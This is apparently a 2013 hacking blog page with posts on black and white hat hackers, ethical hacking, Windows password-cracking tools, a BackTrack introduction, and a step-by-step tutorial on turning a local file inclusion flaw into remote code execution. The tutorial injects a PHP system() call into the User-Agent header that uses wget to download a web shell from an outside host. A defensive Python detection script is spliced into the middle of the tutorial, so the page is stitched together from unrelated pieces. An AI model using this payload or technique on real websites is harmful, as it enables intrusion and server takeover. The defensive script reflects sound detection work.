Sunday, 11 August 2013

What’s a Blackhat Hacker?


A black hat hacker is an individual with extensive computer knowledge whose purpose is to breach or bypass internet security. Black hat hackers are also known as crackers or dark-side hackers. The general view is that, while hackers build things, crackers break things. They are computer security hackers who break into computers and networks, and who may also create computer viruses. The term “black hat” comes from old westerns, where the bad guys usually wore black hats and the good guys wore white ones.

White hat hackers also identify security weaknesses; but instead of performing malicious attacks and theft, they expose the security flaw in such a way as to alert the owner that there is a weakness, so it can be fixed before a black hat hacker can take advantage of it. Though they often start out as black hat hackers, white hat hackers are sometimes paid consultants or actual employees of a company that needs its systems protected. Other types of hackers include blue hat hackers and gray hat hackers. Blue hat hackers are security professionals who are invited by Microsoft to expose vulnerabilities in Windows products. Gray hat hackers are hackers who perform both malicious activities and helpful ones.

How an ethical hacker works

Obeying the ethical hacking commandments:

  • Every ethical hacker must abide by a few basic commandments. If not, bad things can happen. I’ve seen these commandments ignored or forgotten when planning or executing ethical hacking tests. The results weren’t positive.

Working ethically:

  • The word ethical in this context can be defined as working with high professional morals and principles. Whether you’re performing ethical hacking tests against your own systems or for someone who has hired you, everything you do as an ethical hacker must be aboveboard and must support the company’s goals. No hidden agendas are allowed!
  • Trustworthiness is the ultimate tenet. The misuse of information is absolutely forbidden. That’s what the bad guys do.

Respecting privacy:

  • Treat the information you gather with the utmost respect. All information you obtain during your testing — from Web-application log files to clear-text passwords — must be kept private. Don’t use this information to snoop into confidential corporate information or private lives. If you sense that someone should know there’s a problem, consider sharing that information with the appropriate manager.
  • Involve others in your process. This is a “watch the watcher” system that can build trust and support your ethical hacking projects.

Not crashing your systems:

  • One of the biggest mistakes I’ve seen when people try to hack their own systems is inadvertently crashing their systems. The main reason for this is poor planning. These testers have not read the documentation or misunderstand the usage and power of the security tools and techniques.
  • You can easily create DoS conditions on your systems when testing. Running too many tests too quickly on a system causes many system lockups. I know because I’ve done this! Don’t rush things and assume that a network or specific host can handle the beating that network scanners and vulnerability assessment tools can dish out.

Executing the plan:

  • In ethical hacking, time and patience are important. Be careful when you’re performing your ethical hacking tests. A hacker in your network or an employee looking over your shoulder may watch what’s going on. This person could use this information against you. It’s not practical to make sure that no hackers are on your systems before you start. Just make sure you keep everything as quiet and private as possible.
  • This is especially critical when transmitting and storing your test results. You’re now on a reconnaissance mission. Find as much information as possible about your organization and systems, which is what malicious hackers do. Start with a broad view and narrow your focus. Search the Internet for your organization’s name, your computer and network system names, and your IP addresses. Google is a great place to start for this.
  • Don’t take ethical hacking too far, though. It makes little sense to harden your systems against unlikely attacks. For instance, if you don’t have an internal Web server running, you may not have to worry too much about. However, don’t forget about insider threats from malicious employees or your friends or colleagues!

Best Windows Password Crackers

  • ERD Commander

Microsoft Diagnostics and Recovery Toolset (MSDaRT) 6.5 helps diagnose and repair a system that has trouble starting or has other issues. When you start the system using the Emergency Repair Disk (ERD), also referred to as Boot CD for MSDaRT, a System Recovery Options dialog box appears. A graphical environment and a command-line console are available.

  • Hiren Boot CD

Hiren’s Boot CD is an all-in-one bootable CD that contains a large collection of useful tools for a variety of situations: hard drive failure, virus infections, partitioning, password recovery and data recovery.

  • Offline NT Password Cracker

This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003/Vista system, by modifying the encrypted password in the registry’s SAM file.

  • Ophcrack

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Other tools:

  • Active Password Changer – http://www.password-changer.com/
  • PC Login Now – http://pcloginnow.com
  • Trinity Rescue Kit – http://trinityhome.org
  • Windows Password Recovery Tool – http://www.windowspasswordsrecovery.com/
  • ElcomSoft System Recovery – http://www.elcomsoft.com

Friday, 9 August 2013

Uploading a shell to a website through Local File Inclusion [LFI to RCE]

1 – Introduction
2 – Finding LFI
3 – Checking if proc/self/environ is accessible
4 – Injecting malicious code
5 – Access our shell
6 – Shoutz

>> 1 – Introduction
In this tutorial I show you how to get a shell on a website using a Local File Inclusion vulnerability and
injecting malicious code through proc/self/environ. It is a step-by-step tutorial.
>> 2 – Finding LFI
- First we need a website that is vulnerable to Local File Inclusion. Suppose we have found our target; let’s check it.
- Now let’s replace contact.php with ../ so the URL will become
and we get an error:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
There is a good chance the site has a Local File Inclusion vulnerability. Let’s go to the next step.
- Now let’s check for etc/passwd to see if it really is vulnerable to Local File Inclusion. Let’s make a request:
We get an error and no etc/passwd file:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go up more directories:
We successfully included the etc/passwd file:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
>> 3 – Checking if proc/self/environ is accessible
- Now let’s see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ.
If you get something like this:
DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80
then proc/self/environ is accessible. If you get a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.
>> 4 – Injecting malicious code
- Now let’s inject our malicious code into proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:
Choose Tamper and in the User-Agent field write the following code:
<?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>

Then submit the request.
Our command will be executed through system() (it will download the txt shell from http://hack-bay.com/Shells/gny.txt and save it as shell.php in the
website directory), and our shell will be created. If it doesn’t work, try exec(), because system() can be disabled on the web server from php.ini.
>> 5 – Access our shell
- Now let’s check if our malicious code was successfully injected. Let’s check if the shell is present.
Our shell is there. The injection was successful.
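The defender's side of the technique in steps 2 to 4, as an added example that is not part of the original tutorial: resolve_view() shows what a page like index.php?view=contact.php should do before include() (an allow-list of page names, then a canonical-path check that keeps the resolved file inside the pages directory), and scan_log() runs per-request detection rules over Apache combined-format access log lines, flagging ../ sequences and sensitive targets in the query string and a PHP tag pair smuggled into the User-Agent header. The log lines, the pages directory /var/www/pages, the page names in ALLOWED_VIEWS and the host attacker.example are all constructed for this example and are not from the page.

```python
"""Added example (not from the original tutorial): hardening and detection for
the LFI -> /proc/self/environ technique. All log lines, hosts, paths and page
names below are constructed for the example."""
import os
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlparse

# Page names the application really offers (assumed); anything else is refused.
ALLOWED_VIEWS = {"home.php", "contact.php", "about.php"}

# Files an include parameter should never resolve to, in canonical form.
SENSITIVE = ("/etc/passwd", "/proc/self/environ")

# "../" or "..\" as a whole path component, anywhere in the value.
TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")

# A complete PHP open/close tag pair, which has no business in a request header.
PHP_TAG = re.compile(r"<\?[\s\S]*?\?>")

# Apache combined log: ip ident user [ts] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def confined_path(pages_dir: str, view: str):
    """Canonical-path gate: the resolved file must stay under pages_dir.

    os.path.join() discards pages_dir when view is absolute, so an absolute
    /proc/self/environ is only caught because the check runs after joining.
    """
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, view))
    # commonpath() compares whole components, so /var/www/pages2 does not pass
    # as a child of /var/www/pages the way a plain string-prefix test would.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def resolve_view(pages_dir: str, view: str):
    """What index.php should do before include(): allow-list first, then the
    path gate as defence in depth."""
    if view not in ALLOWED_VIEWS:
        return None
    return confined_path(pages_dir, view)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding until stable, so double-encoded ..%252F is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(line: str):
    """Return a finding record for one log line, or None if it is clean."""
    match = LOG_RE.match(line)
    if not match:
        return None
    target = decode_fully(match.group("target"))
    findings = []
    for name, values in parse_qs(urlparse(target).query, keep_blank_values=True).items():
        for value in values:
            if TRAVERSAL.search(value):
                findings.append(f"traversal in {name}")
            # Collapse ../ against a virtual root: ../../etc/passwd -> /etc/passwd
            canonical = posixpath.normpath("/" + value)
            if canonical in SENSITIVE:
                findings.append(f"sensitive path {canonical} in {name}")
    if PHP_TAG.search(decode_fully(match.group("ua"))):
        findings.append("php tag in user-agent")
    if not findings:
        return None
    return {"ip": match.group("ip"), "ts": match.group("ts"),
            "target": match.group("target"), "findings": findings}


def scan_log(text: str):
    """Run inspect_request() over every line and keep only the hits."""
    return [hit for hit in (inspect_request(l) for l in text.splitlines()) if hit]


# Constructed sample: a probe sequence like the one in the tutorial, then a
# follow-up fetch of the dropped file, which these per-request rules do not flag.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Aug/2013:10:00:01 +0000] "GET /index.php?view=contact.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Aug/2013:10:00:07 +0000] "GET /index.php?view=../ HTTP/1.1" 200 215 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Aug/2013:10:00:12 +0000] "GET /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1980 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Aug/2013:10:00:20 +0000] "GET /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 3301 "-" "<?system('wget http://attacker.example/x.txt -O shell.php');?>"
203.0.113.5 - - [09/Aug/2013:10:01:00 +0000] "GET /shell.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["target"], "->", ", ".join(hit["findings"]))
    print(resolve_view("/var/www/pages", "contact.php"))
    print(resolve_view("/var/www/pages", "../../../../../../etc/passwd"))
```

Two design points: the canonical-path check runs after os.path.join() because join() throws the base directory away for an absolute argument, which is exactly the /proc/self/environ case; and the last sample line (the fetch of shell.php) produces no finding, because a request for an ordinary-looking file is only suspicious in the context of the probes that preceded it, which is a correlation job rather than a per-request rule.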

Introduction to BackTrack5

What Is BackTrack?


BackTrack is an all-in-one tool which is the heart of hackers (both newbies and professionals). If I had to talk about BackTrack and hacking, I would put it in just a single sentence: “BackTrack takes the word impossible out of a hacker’s dictionary!” BackTrack contains all the tools a hacker requires. Once you master BackTrack, no one can beat you.
As this is an operating system (OS), I can’t give you a theoretical tutorial, but I will give you a visual one, so I have embedded a video that will help you understand how to handle and use BackTrack. I found this video on YouTube and am sharing it with you!
Have a look…

Copyright @ 2013 HaCkEr PoInT.